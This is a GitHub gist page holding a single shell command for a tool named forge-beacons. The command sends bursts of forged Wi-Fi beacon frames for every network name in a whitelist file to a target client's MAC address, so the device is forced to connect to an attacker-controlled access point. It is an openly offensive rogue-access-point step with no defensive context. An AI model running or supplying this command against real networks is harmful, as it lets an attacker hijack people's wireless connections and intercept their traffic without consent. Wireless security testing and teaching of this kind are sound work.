Skip to content

Instantly share code, notes, and snippets.

@s0lst1c3
Created November 4, 2019 06:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save s0lst1c3/6703132b98a28e228b644c273a7e7f07 to your computer and use it in GitHub Desktop.
Save s0lst1c3/6703132b98a28e228b644c273a7e7f07 to your computer and use it in GitHub Desktop.
# transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file ssid-whitelist.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment